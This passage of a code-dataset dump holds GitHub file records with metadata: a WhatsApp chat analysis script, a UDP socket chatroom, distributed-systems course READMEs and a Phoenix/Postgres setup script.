happy**\n![](example_images/lo.png)\n\n**Someone who barely shows up**\n![](example_images/will.png)\n" }, { "alpha_fraction": 0.5501395463943481, "alphanum_fraction": 0.5654883980751038, "avg_line_length": 32.489097595214844, "blob_id": "9d51477cfb5f6d5e92d479756d2a5009c5822d42", "content_id": "cfaec32ccfebf429570e48a7c095000413da02b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10750, "license_type": "no_license", "max_line_length": 184, "num_lines": 321, "path": "/src/dataframe_analysis.py", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": "UTF-8", "text": "import pandas as pd\n\nfrom src import misc\nfrom src.misc import print_separator_line\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport wordcloud\nfrom stop_words import get_stop_words\nimport emojis\nfrom operator import add\n\n\ndef df_general_info(df: pd.DataFrame):\n\n counts = {author: len(frame) for author, frame in df.groupby(df[\"author\"])}\n\n print(\"There are\", len(counts), \"different authors in this chat\")\n\n for author in counts:\n print(author, \"has written\", counts[author], \"messages\")\n\n print_separator_line()\n\n print(\"You have exchanged\", str(len(df)), \" messages between \", str(df.iloc[0].datetime), \"and\", str(df.iloc[-1].datetime))\n\n print_separator_line()\n\n print(len(df[df.isMedia == False]), \"text objects\")\n print(len(df[df.isMedia == True]), \"media objects\")\n\n\ndef df_length_info(df: pd.DataFrame):\n index_longest = df.length.sort_values().index[-1]\n index_shortest = df.length.sort_values().index[0]\n\n print(\"Shortest message is #\" + str(index_shortest) + \" with a length of \" + str(\n len(df.iloc[index_shortest].message)) + \":\")\n print(df.iloc[index_shortest].message)\n\n print_separator_line()\n\n print(\"Longest message is #\" + str(index_longest) + \" with a length of \" + str(\n len(df.iloc[index_longest].message)) + \":\")\n print(df.iloc[index_longest].message)\n\n\ndef bar(x: list, y: list, xlabel, ylabel, color='b', rotation='vertical'):\n\n if type(y[0])==list:\n for i in range(len(y)):\n plt.bar(x, y[i], align='center')\n else:\n plt.bar(x, y, align='center', color=color)\n plt.xticks(rotation='vertical')\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.show()\n\n\ndef df_plot_month_year(df: pd.DataFrame, start=\"01-2000\", end=\"12-2050\", auto=False):\n\n if auto:\n max_size = 0\n for year, frame in df.groupby(df[\"datetime\"].dt.year):\n if len(frame) > max_size:\n max_size = len(frame)\n max_year = int(year)\n start = \"06-\" + str(max_year-1)\n end = \"06-\" + str(max_year+1)\n print(\"Max year is\", max_year)\n\n start = dt.datetime.strptime(start, \"%m-%Y\")\n end = dt.datetime.strptime(end, \"%m-%Y\")\n\n dates = []\n counts = []\n\n for frame in df.groupby([df[\"datetime\"].dt.year, df[\"datetime\"].dt.month]):\n\n if frame[1].iloc[0][\"datetime\"] < start or frame[1].iloc[0][\"datetime\"] > end:\n continue\n\n # frame[0] contains (year, month)\n # frame[1] contains the full dataframe with those years and months only\n dates.append(str(frame[0][0]) + \"-\" + str(frame[0][1]))\n counts.append(len(frame[1]))\n\n bar(dates, counts, \"Date\", \"Total number of messages\", color='r')\n\n\ndef df_plot_year(df: pd.DataFrame):\n dates = []\n counts_per_author = {}\n\n for author in df_get_author_list(df):\n counts_per_author[author] = []\n\n for year, year_frame in df.groupby(df[\"datetime\"].dt.year):\n dates.append(str(year))\n for author, frame in year_frame.groupby(year_frame[\"author\"]):\n counts_per_author[author].append(len(frame))\n\n tots = [0 for x in dates]\n for author in counts_per_author:\n counts_per_author[author] = list(map(add, counts_per_author[author], tots))\n tots = counts_per_author[author]\n plt.bar(dates, counts_per_author[author], label=author)\n\n plt.xlabel(\"Year\")\n plt.ylabel(\"Total number of messages\")\n plt.legend()\n plt.show()\n\n\ndef df_emojis(df: pd.DataFrame, n=5):\n\n print(\"EMOJI ANALYSIS\")\n\n author_counters = {}\n all_emojis = {}\n\n for author in df_get_author_list(df):\n author_counters[author] = {}\n\n for row in df.iterrows():\n emoji_list = row[1][\"emojis\"]\n author = row[1][\"author\"]\n\n if emoji_list:\n for emoji in emoji_list:\n if emoji in author_counters[author]:\n author_counters[author][emoji] += 1\n else:\n author_counters[author][emoji] = 1\n if emoji in all_emojis:\n all_emojis[emoji] += 1\n else:\n all_emojis[emoji] = 1\n\n all_emojis = {k: v for k, v in sorted(all_emojis.items(), reverse=True, key=lambda item: item[1])}\n print(\"OVERALL:\")\n i = 1\n for emoji in all_emojis:\n if i > n:\n break\n print(emoji, \"--\", all_emojis[emoji])\n i += 1\n\n bar(\n [emojis.decode(k) for k in list(all_emojis.keys())[:(n*2)]],\n [all_emojis[k] for k in list(all_emojis.keys())[:(n*2)]],\n \"Emojis\",\n \"Number of times used\",\n rotation=''\n )\n\n for author in author_counters:\n author_counters[author] = {k: v for k, v in sorted(author_counters[author].items(), reverse=True, key=lambda item: item[1])}\n print(author)\n i = 1\n for emoji in author_counters[author]:\n if i > n:\n break\n print(emoji, \"--\", author_counters[author][emoji])\n i += 1\n\n\ndef df_words(df: pd.DataFrame, title=\"\"):\n\n full_string = \" \".join([str(row[1][\"message\"]).replace(\"\\n\", \" \").lower() for row in df.iterrows() if row[1][\"message\"]!=\"<Media omessi>\"])\n authors = df_get_author_list(df)\n\n full_string_authors = {}\n for author in authors:\n full_string_authors[author] = \" \".join([str(row[1][\"message\"]).replace(\"<Media omessi>\", \"\").replace(\"\\n\", \" \").lower() for row in df.iterrows() if row[1][\"author\"] == author])\n\n stopwords = get_stop_words(\"it\")\n\n wc = wordcloud.WordCloud(\n stopwords=stopwords,\n # width=1000,\n # height=500,\n background_color=\"white\"\n )\n\n wc.generate(full_string)\n plt.axis(\"off\")\n plt.imshow(wc, interpolation=\"bilinear\")\n plt.title(title + \" | \" + \"OVERALL\")\n plt.show()\n\n for author in full_string_authors:\n wc.generate(full_string_authors[author])\n plt.axis(\"off\")\n plt.imshow(wc, interpolation=\"bilinear\")\n plt.title(title + \" | \" + author)\n plt.show()\n\n\ndef df_setup(df: pd.DataFrame) -> pd.DataFrame:\n\n # Creates the 'isMedia' column\n df[\"message\"] = df[\"message\"].astype(str)\n beginning = dt.datetime.now()\n df[\"isMedia\"] = df.apply(lambda row: row[\"message\"].find(\"<Media omessi>\") != -1, axis=1)\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the isMedia column\")\n\n # 14/06/15 12:52:00\n beginning = dt.datetime.now()\n df[\"datetime\"] = pd.to_datetime(df[\"datetime\"], format=\"%d/%m/%y %H:%M:%S\")\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to convert 'datetime' from string\")\n\n beginning = dt.datetime.now()\n df[\"isMedia\"] = df[\"isMedia\"].astype(bool)\n df[\"author\"] = df[\"author\"].astype(str)\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to convert column types\")\n\n beginning = dt.datetime.now()\n df[\"message\"] = df.apply(lambda row:\n row[\"message\"].replace(\"__x__\", \"|\")\n .replace(\"__a__\", \"*\")\n .replace(\"__vv__\", '\"')\n .replace(\"__v__\", \"'\"), axis=1\n )\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to reformat the 'message' column\")\n\n beginning = dt.datetime.now()\n df[\"emojis\"] = df.apply(lambda row: emojis.get(row[\"message\"]), axis=1)\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the 'emojis' column\")\n\n beginning = dt.datetime.now()\n df[\"length\"] = df.apply(lambda row: len(row[\"message\"]), axis=1)\n print((dt.datetime.now() - beginning).microseconds / 1000, \"ms to create the 'length' column\")\n\n return df\n\n\ndef df_month_analysis(df, month=\"0\", year=\"0\"):\n\n if month == '0' and year == '0':\n max_size = 0\n for date_i, frame_i in df.groupby([df[\"datetime\"].dt.year, df[\"datetime\"].dt.month]):\n if len(frame_i) > max_size:\n max_size = len(frame_i)\n month = date_i[1]\n year = date_i[0]\n frame = frame_i\n print(\"The month you talked the most is \" + str(month) + \"-\" + str(year))\n else:\n frame = df[\n (df[\"datetime\"].dt.year==int(year)) &\n (df[\"datetime\"].dt.month==int(month))\n ]\n print(\"There have been\", len(frame), \"messages in \" + month + \"-\" + year)\n\n df_words(frame, title=\"What you talked about on \" + str(month) + \"-\" + str(year))\n\n\ndef df_filter(df: pd.DataFrame,\n words=[],\n words_or=[],\n authors=[],\n start_date=\"30/03/2000 18:00\",\n end_date=\"30/03/2050 18:00\") -> pd.DataFrame:\n\n condition = ((df[\"datetime\"] > dt.datetime.strptime(start_date, \"%d/%m/%Y %H:%M\")) &\n (df[\"datetime\"] < dt.datetime.strptime(end_date, \"%d/%m/%Y %H:%M\")))\n\n if words:\n for word in words:\n condition = ((condition) & df[\"message\"].str.contains(word))\n if words_or:\n words_condition = 0\n for word in words_or:\n words_condition = ((words_condition) | (df[\"message\"].str.contains(word)))\n condition = (condition) & (words_condition)\n\n if authors:\n author_condition = 0\n for author in authors:\n author_condition = (author_condition) | (df[\"author\"].str.contains(author))\n condition = (condition) & (author_condition)\n\n return df[condition]\n\n\ndef df_plot_days(df, start=\"01/03/2020\", end=\"01/04/2020\", auto=False):\n\n if auto:\n max_len = 0\n for (year, month), frame in df.groupby([df[\"datetime\"].dt.year, df[\"datetime\"].dt.month]):\n if len(frame) > max_len:\n max_len = len(frame)\n max_year = year\n max_month = month\n print(\"Max month is \" + str(max_month) + \"-\" + str(max_year))\n last_day = misc.get_last_day_of_month(max_month)\n start = \"01/\" + str(max_month) + \"/\" + str(max_year)\n end = str(last_day) + \"/\" + str(max_month) + \"/\" + str(max_year)\n # 23/03/2020\n\n start = dt.datetime.strptime(start, \"%d/%m/%Y\")\n end = dt.datetime.strptime(end, \"%d/%m/%Y\")\n\n filtered_df = df_filter(\n df,\n start_date=start.strftime(\"%d/%m/%Y %H:%M\"),\n end_date=end.strftime(\"%d/%m/%Y %H:%M\")\n )\n\n dates = []\n counts = []\n for date, frame in filtered_df.groupby([df[\"datetime\"].dt.year, df[\"datetime\"].dt.month, df[\"datetime\"].dt.day]):\n dates.append(str(date[2]) + \"-\" + str(date[1]))\n counts.append(len(frame))\n\n bar(dates, counts, \"Day\", \"Total number of messages\")\n\n\ndef df_get_author_list(df: pd.DataFrame) -> list:\n return [author for author in df[\"author\"].value_counts().index]\n" }, { "alpha_fraction": 0.299539178609848, "alphanum_fraction": 0.3963133692741394, "avg_line_length": 17.08333396911621, "blob_id": "ce9916f7fd9c33f558dc7d64dbe7ac1f404b20e2", "content_id": "9635d5e8d964d63344401989856a21f8ea9a6827", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 434, "license_type": "no_license", "max_line_length": 57, "num_lines": 24, "path": "/src/misc.py", "repo_name": "andreaalf97/whatsapp_analysis", "src_encoding": "UTF-8", "text": "def print_separator_line():\n print(\"===============================\")\n\n\ndef get_last_day_of_month(month: int) -> int:\n cases = {\n 1: 31,\n 2: 28,\n 3: 31,\n 4: 30,\n 5: 31,\n 6: 30,\n 7: 31,\n 8: 31,\n 9: 30,\n 10: 31,\n 11: 30,\n 12: 31\n }\n\n if month not in cases:\n raise Exception(\"Month must be between 1 and 12\")\n\n return cases[month]\n" } ]
5
xiaoxiaoxiaoxuan1028/socket-chatroom
https://github.com/xiaoxiaoxiaoxuan1028/socket-chatroom
c2cac42831100e37acd7c87a2c19154649ace1e5
527f00d388eae63433b29474c514090ec06f4190
e91598376fd4c250ee94268e1b181fd0d1194220
refs/heads/master
2020-12-08T00:32:05.742955
2020-01-09T15:09:45
2020-01-09T15:09:45
232,836,142
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 26.5, "blob_id": "c5f6284873b9aed7f214118938525da3357ec2ce", "content_id": "d5e93b3cb8374f28038779135f228e1994d1c8b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/README.md", "repo_name": "xiaoxiaoxiaoxuan1028/socket-chatroom", "src_encoding": "UTF-8", "text": "# socket-chatroom\nchat room based on the python socket \n" }, { "alpha_fraction": 0.46327272057533264, "alphanum_fraction": 0.5032727122306824, "avg_line_length": 22.122806549072266, "blob_id": "1129defe58174e3da2f3d128fd846183136ed24b", "content_id": "cd40e660cc8fd1e6ccc6bcdad7a597a51c1e4209", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1539, "license_type": "no_license", "max_line_length": 69, "num_lines": 57, "path": "/client.py", "repo_name": "xiaoxiaoxiaoxuan1028/socket-chatroom", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n__author__ = '22920172204299'\r\n__date__ = '2019/11/06'\r\nimport socket\r\nimport threading\r\n\r\n\r\ndef recv(sock, addr):\r\n '''\r\n 一个UDP连接在接收消息前必须要让系统知道所占端口\r\n 也就是需要send一次,否则win下会报错\r\n “ data=sock.recv(1024)\r\n OSError: [WinError 10022] 提供了一个无效的参数。 ”\r\n '''\r\n #sock.sendto(name.encode('utf-8'), addr)\r\n while True:\r\n data = sock.recv(1024)\r\n print(data.decode('utf-8'))##\r\n\r\n\r\ndef send(sock, addr):\r\n while True:\r\n string = input()\r\n message = name + ' : ' + string\r\n data = message.encode('utf-8')\r\n sock.sendto(data, addr)\r\n if string == 'EXIT':\r\n break\r\n\r\n\r\ndef main():\r\n\r\n tr = threading.Thread(target=recv, args=(s, server), daemon=True)\r\n ts = threading.Thread(target=send, args=(s, server))\r\n tr.start()\r\n ts.start()\r\n ts.join()\r\n s.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n server = ('127.0.0.1', 9998)\r\n\r\n print(\"-----欢迎来到聊天室,退出聊天室请输入'EXIT'-----\")\r\n name = input('请输入你的名称:')\r\n\r\n while True: \r\n s.sendto(name.encode('utf-8'), server) \r\n data = s.recv(1024) \r\n if data.decode('utf-8') == 'false': \r\n name = input('昵称被占用,请重新输入:') \r\n else: \r\n break \r\n\r\n print('-----------------%s------------------' % name)\r\n main()\r\n" }, { "alpha_fraction": 0.4019336998462677, "alphanum_fraction": 0.4330110549926758, "avg_line_length": 28.808509826660156, "blob_id": "f51921d039a1657771e548a6b4045ef24485d446", "content_id": "7f10848d7bdba7219dd4611c4e73062ffe968b51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1470, "license_type": "no_license", "max_line_length": 69, "num_lines": 47, "path": "/server.py", "repo_name": "xiaoxiaoxiaoxuan1028/socket-chatroom", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n__author__ = '22920172204299'\r\n__date__ = '2019/11/06'\r\n\r\nimport socket\r\nimport threading\r\n\r\n\r\ndef main():\r\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n addr = ('127.0.0.1', 9998)\r\n s.bind(addr)\r\n print('UDP Server on %s:%s...', addr[0], addr[1])\r\n\r\n user = {} # {addr:name}\r\n while True:\r\n try:\r\n data, addr = s.recvfrom(1024)\r\n if not addr in user:\r\n if data.decode('utf-8') in user.values():\r\n s.sendto('false'.encode(), addr)\r\n continue\r\n else:\r\n s.sendto('true'.encode(), addr)\r\n for address in user:\r\n s.sendto(data + ' 进入聊天室...'.encode(), address)\r\n user[addr] = data.decode('utf-8')\r\n continue\r\n\r\n if 'EXIT' in data.decode('utf-8'):\r\n name = user[addr]\r\n user.pop(addr)\r\n for address in user:\r\n s.sendto((name + ' 离开了聊天室...').encode(), address)\r\n else:\r\n print('\"%s\" from %s:%s' %\r\n (data.decode('utf-8'), addr[0], addr[1]))\r\n for address in user:\r\n if address != addr:\r\n s.sendto(data, address)\r\n\r\n except ConnectionResetError:\r\n print('Someone left unexcept.')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n" } ]
3
BobbyRobillard/distributed-systems
https://github.com/BobbyRobillard/distributed-systems
2ae85b49dc38e94276d466174a85de0220214162
b96f95150fb74cdfe7402dabf0eff960e379d2bd
8d9d6caf087fd09c885885f662538c4c29bed59e
refs/heads/master
2022-08-19T02:05:07.686120
2019-12-14T04:46:45
2019-12-14T04:46:45
204,712,752
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7709978222846985, "alphanum_fraction": 0.7731514573097229, "avg_line_length": 33.82500076293945, "blob_id": "a172506bcf1c08e030fcdac5c614804af25b90c5", "content_id": "ec9553eee3d7bf6767fb6a55d9a55671dae10184", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1393, "license_type": "no_license", "max_line_length": 80, "num_lines": 40, "path": "/proj2/Topologies.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Topologies\n\n## Complete (full)\n\nA graph where every node is connected to all other nodes.\n\n## Linear (line)\n\nA graph where every node is arranged linearly and connected to direct neighbors.\n\n## RandPlanar (rand2D)\n\nA graph where every node is randomly placed on a uniform plane and connected to\nnodes within a certain distance.\n\n## Cubic (3Dtorus)\n\nA graph where nodes are arranged in cubic fashion and connected to neighbors,\nincluding those passing to the other side of the cube.\n\nThe implementation generates {x, y, z} coordinates in the form of a 3D matrix.\nNodes are connected where two coordinates are the same and the other differs by\none or wraps around to the other side.\n\n## Hexagonal (honeycomb)\n\nA graph where nodes are arranged in a hexagonal grid and connected to neighbors.\n\nThe implementation generates {x, y} coordinates in a 'skewed' fashion, where the\nx axis is horizontal and the y axis is slanted right. This calculates the\ncurrent ring of the hexagon (distance from center) and the normalized index\n(index in current ring) and uses the current wedge to determine {x, y}. Nodes\nare connected if the maximum distance along an {x, y, z} axis is one.\n\nSee <https://www.redblobgames.com/grids/hexagons/> for reference.\n\n## RandHexagonal (randhoneycomb)\n\nA graph where nodes are arranged in a hexagonal grid, as the above, and also\nconnected to a random node in the network.\n" }, { "alpha_fraction": 0.7253731489181519, "alphanum_fraction": 0.7388059496879578, "avg_line_length": 29.454545974731445, "blob_id": "142a597f396174f06fa8daac1d5b7034143b371f", "content_id": "11d8aaccf2a5ac7bbdf69b9cb8bbf4b3efb44877", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 670, "license_type": "no_license", "max_line_length": 94, "num_lines": 22, "path": "/proj2/README.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Proj2\n\n**Team Members:**\n- Robert Robillard\n- William B. Anderson\n\n**Compile With:**\n- $ mix escript.build\n- $ ./proj2 <num_nodes> <topology> <algorithm>\n\n**What is Working:**\n- Everything\n\n**What is the largest network you managed to deal with for each type of\n topology and algorithm:**\n- We managed to run with 500 nodes in each topology in each algorithm.\nPast that it simply took too long to obtain results from given the time constraints.\nShould we have used a more powerful machine we probably could have pushed 1000 without issues.\n\n**Note:**\n- There are is an additional folder \"output_data\" which contains all the raw data\nand xlsx from which the graphs in our report are derived.\n" }, { "alpha_fraction": 0.4776536226272583, "alphanum_fraction": 0.75698322057724, "avg_line_length": 28.224489212036133, "blob_id": "87bdd7ae0b2f11e310838e490e2986268827734a", "content_id": "290f7894989fbb4f9ed2090ee870b90f50be34aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2864, "license_type": "no_license", "max_line_length": 145, "num_lines": 98, "path": "/proj1/README.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Project 1 Readme\n\n**NOTE:** Please also see \"Vampire-Numbers.md\" for an explanation of how our vampire number finder works.\n\n1) **Group Members**\n - Robert C. Robillard: 4987-1906\n - William B. Anderson: 6695-8353\n - To run our code $cd into the proj1 folder and run $ mix run proj1.exs <starting_number> <ending_number>\n\n2) We used 3 worker actors, as that was all the cores I could afford to give my VM.\n\n3) We give each worker a near equal portion of tasks. So for 3 workers each receives 1/3 of the work.\n **Note:** I say \"near equal\" because sometimes the range isn't exactly divisible by 3 and the last worker\n gets to slack off and do slightly less. We determined this by using Dobra's recommendation of \"$ perf top\"\n to check when more time was being spent in the Kernel (message passing). We deemed that having each worker\n complete all it's work then respond was the best approach given the timeframe to complete to project.\n\n **Note:** Had we had more time we would have taken a slightly different approach, and had each worker complete\n a smaller subset of work and report when finished, then take another subset. Thus making sure no worker was ever idle.\n But, unfortunately other classes and commitments are a thing, and the time it would take to create that solutions couldn't be spent currently.\n\n4) Running \"$ mix run proj1.exs 100000 200000\" yields the following:\n102510 201 510\n104260 260 401\n105210 210 501\n105264 204 516\n105750 150 705\n108135 135 801\n110758 158 701\n115672 152 761\n116725 161 725\n117067 167 701\n118440 141 840\n120600 201 600\n123354 231 534\n124483 281 443\n125248 152 824\n125433 231 543\n125460 204 615 246 510\n125500 251 500\n126027 201 627\n126846 261 486\n129640 140 926\n129775 179 725\n131242 311 422\n132430 323 410\n133245 315 423\n134725 317 425\n135828 231 588\n135837 351 387\n136525 215 635\n136948 146 938\n140350 350 401\n145314 351 414\n146137 317 461\n146952 156 942\n150300 300 501\n152608 251 608\n152685 261 585\n153436 356 431\n156240 240 651\n156289 269 581\n156915 165 951\n162976 176 926\n163944 396 414\n172822 221 782\n173250 231 750\n174370 371 470\n175329 231 759\n180225 225 801\n180297 201 897\n182250 225 810\n182650 281 650\n186624 216 864\n190260 210 906\n192150 210 915\n193257 327 591\n193945 395 491\n197725 275 719\n\n5) The time run was obtained via \"$ time mix run proj1.exs 100000 200000\" and is:\n\n- real 0m0.733s\n- user 0m0.983s\n- sys 0m0.168s\n\n**Note:** Our vampire solving algorithm is very fast, to make real use of parallelism it's\nbest to run it with larger numbers. For instance, running \"$ time mix run proj1.exs 1000 10000000\" yields\nthe following:\n\n- real 0m20.314s\n- user 0m46.339s\n- sys 0m0.418s\n\n6) We solved up to 50,000,000. But could have solved much higher, we just didn't feel like wasting time playing\nthe waiting game.\n\n7) We didn't use \":observer.start\" and can't because we ran this on a headless VM.\n" }, { "alpha_fraction": 0.5518423318862915, "alphanum_fraction": 0.5621250867843628, "avg_line_length": 27.463415145874023, "blob_id": "3d83e7362b0316dcef3d10071f7d331b32bf7301", "content_id": "183b435c71146e5480793ba0193a51ada7344c16", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1167, "license_type": "no_license", "max_line_length": 82, "num_lines": 41, "path": "/phx", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\napt-get install -y nodejs\napt install -y npm\n\n# Postgres Install\napt-get install -y postgresql postgresql-contrib\n\n# Reset password of POSTGRES default user for ecto install.\nsudo -u postgres psql -c \"ALTER USER postgres PASSWORD 'postgres';\"\nservice postgresql restart\n\n# Phoenix Install\nmix local.hex\nmix archive.install hex phx_new 1.4.11\n\n# Install depedancies for proj4.2\ncd /vagrant/proj42\nmix deps.get\nmix deps.compile\ncd assets && npm install\nnode node_modules/webpack/bin/webpack.js --mode development\n\ncd /vagrant/proj42\nmix ecto.create\n\necho \"**************************************************\"\necho \"**************************************************\"\necho \"IGNORE ANY AND ALL ERRORS. NODE && NPM ARE GARBAGE.\"\necho \"**************************************************\"\necho \"**************************************************\"\necho \"\"\necho \"\"\necho \"-----------------------------------\"\necho \"Everything is set. Remember to 'cd proj42'.\"\necho \"\"\necho \"Run 'mix phx.server' to start the web server.\"\necho \"\" echo \"**NOTE:** You must restart the server anytime you update your code.\"\necho \"-----------------------------------\"\necho \"\"\necho \"\"\n" }, { "alpha_fraction": 0.4906401038169861, "alphanum_fraction": 0.51902174949646, "avg_line_length": 47.70588302612305, "blob_id": "1a33caf08842e8996305f734d3d30288a92facb3", "content_id": "50ce95a7949a8e47540c3da6787bdb1c51ab44ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3312, "license_type": "no_license", "max_line_length": 132, "num_lines": 68, "path": "/proj1/Vampire-Numbers.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Vampire Numbers\n\nProject 1: https://ufl.instructure.com/courses/379812/assignments/3984683\n\n## Ranged Search Algorithm\n\nRestricts the search values for x and y such that the range of products includes\nthe target value. Described by https://stackoverflow.com/a/36609331/11667368.\n\n```java\npublic class VampireNumbers {\n\n private static final long[] EMPTY = new long[0];\n\n public static long[] rangedSearch(long number) {\n long divisor = 1; //10^digits\n int[] digits = new int[10]; //number of digits available (equal to index)\n for (long temp = number; temp > 0; temp /= 10) { //loop over all digits\n divisor *= 10; //multiply by 10 for each digit\n digits[(int) (temp % 10)]++; //increment count for digit\n }\n return rangedSearch(number, divisor / 100, digits, 0, 0); //recursive start\n }\n\n private static long[] rangedSearch(long number, long divisor, int[] digits, long x, long y) {\n if (divisor < 1) { //no more digits to append\n if (x * y == number && (x % 10 != 0 || y % 10 != 0)) { //valid vampire number\n return new long[] {x, y};\n } else {\n return EMPTY;\n }\n } else {\n long[] fangs = EMPTY;\n x *= 10; //prepare x for next digit\n y *= 10; //prepare y for next digit\n long target = number / divisor; //extract the target number for x * y\n int minXd = Math.max(0, (int) (target / (y + 10) - x)); //minimum x0 digit that can reach target\n int maxXd = y != 0 ? Math.min(9, (int) ((target + 1) / y - x)) : 9; //maximum x0 digit that can reach target\n for (int xd = minXd; xd <= maxXd; xd++) {\n if (digits[xd] == 0) continue; //continue if x0 digit is unavailable\n digits[xd]--; //consume x0 digit\n long rootX = x + xd; //root of x solution for this step\n int minYd = Math.max(x == y ? xd : 0, (int) (target / (rootX + 1) - y)); //minimum y0 digit that can reach target\n int maxYd = rootX != 0 ? Math.min(9, (int) ((target + 1) / rootX - y)) : 9; //maximum y0 digit that can reach target\n for (int yd = maxYd; yd >= minYd; yd--) { //iterate in reverse to ensure fangs are in order\n if (digits[yd] == 0) continue; //continue if y0 digit is unavailable\n digits[yd]--; //consume y0 digit\n long[] result = rangedSearch(number, divisor / 100, digits, rootX, y + yd); //recursive call\n if (result.length > 0) { //if fangs were found\n if (fangs.length > 0) { //if there are current fangs, merge the results\n long[] temp = new long[fangs.length + result.length];\n System.arraycopy(fangs, 0, temp, 0, fangs.length);\n System.arraycopy(result, 0, temp, fangs.length, result.length);\n fangs = temp;\n } else {\n fangs = result;\n }\n }\n digits[yd]++; //free y0 digit\n }\n digits[xd]++; //free x0 digit\n }\n return fangs;\n }\n }\n\n}\n```\n" }, { "alpha_fraction": 0.7414330244064331, "alphanum_fraction": 0.763239860534668, "avg_line_length": 20.399999618530273, "blob_id": "49f1b1e441117edc12c7afbfad5e66458c583b90", "content_id": "a6b6e60b686d486c23bb72f888b62c7688e1f3d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 321, "license_type": "no_license", "max_line_length": 78, "num_lines": 15, "path": "/proj42/README.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Proj42 (4.2)\n\nThis implements a Phoenix web app (CRUD style) to handle the different actions\npreviously supported by the engine to demonstrate this system.\n\nFunctions supported are:\n\n - login/register\n - follow/unfollow\n - tweeting\n - view feed\n - query tweets\n - simulate 200 users\n\nVideo Demo: Attached to submission\n" }, { "alpha_fraction": 0.4694656431674957, "alphanum_fraction": 0.49045801162719727, "avg_line_length": 20.83333396911621, "blob_id": "42aa348e503c497ce0ee737b4585646b0461fd4c", "content_id": "ca2d456da9b59d035457cea589cce63a497cdf30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 524, "license_type": "no_license", "max_line_length": 96, "num_lines": 24, "path": "/proj2/plot-data-generator.py", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "import subprocess\nimport re\n\ntopologies = [\n \"full\",\n \"line\",\n \"rand2D\",\n \"3Dtorus\",\n \"honeycomb\",\n \"randhoneycomb\"\n]\n\nalgo = \"gossip\"\n\nfor t in topologies:\n print(\"\\n_________________________\\n\\n {0} topology\\n_________________________\\n\".format(t))\n for num_nodes in range(1, 250):\n time = subprocess.check_output(\n [\"mix\", \"run\", \"proj2.exs\", str(num_nodes), t, algo]\n )\n\n time = time.decode(\"utf-8\").strip()\n\n print(\"{0}, {1}\".format(str(num_nodes), time))\n" }, { "alpha_fraction": 0.6785714030265808, "alphanum_fraction": 0.692307710647583, "avg_line_length": 21.6875, "blob_id": "767cc91e12b3cdf0eae92a15d6ac7d5320044f32", "content_id": "34dad174568ce218dfb3658beea2344155b0bc41", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 364, "license_type": "no_license", "max_line_length": 92, "num_lines": 16, "path": "/proj3/README.md", "repo_name": "BobbyRobillard/distributed-systems", "src_encoding": "UTF-8", "text": "# Proj2\n\n**Team Members:**\n- Robert Robillard\n- William B. Anderson\n\n**Compile With:**\n- $ mix escript.build\n- $ ./proj3 <num_nodes>\n\n**What is Working:**\n- Node insertion, updating, & lookups\n\n**What is the largest network you managed to deal with for each type of\n topology and algorithm:**\n- We were able to hit about 170 nodes before the time for lookups became too much to handle.\n\n" } ]
8
matthewcarbone/pyroVED
https://github.com/matthewcarbone/pyroVED
51e66abb15bfe29a0dda8b85f6f665c38986fb33
07c500bef9a506bea06d65ec231ef7164abc61f2
1352e81350f4a7d4453fa4ac95c81d641c2f026d
refs/heads/main
2023-07-02T03:28:37.095670
2021-07-09T22:33:02
2021-07-09T22:33:02
null
0
0
null
null
null
null
null
